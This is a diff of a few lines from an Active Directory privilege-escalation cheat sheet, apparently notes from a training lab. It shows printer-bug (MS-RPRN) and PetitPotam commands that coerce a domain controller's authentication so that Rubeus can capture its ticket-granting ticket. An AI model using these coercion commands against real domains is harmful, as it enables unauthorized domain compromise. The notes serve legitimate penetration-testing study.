galminyana/CheatSheets/AD/AD_PrivilegesEscalation.md

 C:> MS-RPRN.exe \\<DC_fqdn_name> \\<server_to_compromise_fqdn>
 RpcRemoteFindFirstPrinterChangeNotificationEx failed.Error Code 1722 - The RPC server is unavailable.     # This error is OK

-# PetiPoam can be user as well
+# PetiPoam can be user as well.
+Does the same.
+# USefull when no print spooler enabled
 C:> PetitPotam.exe dcorp-appsrv dcorp-dc

 # At this point, in Rubeus we got the TGT for DC auth.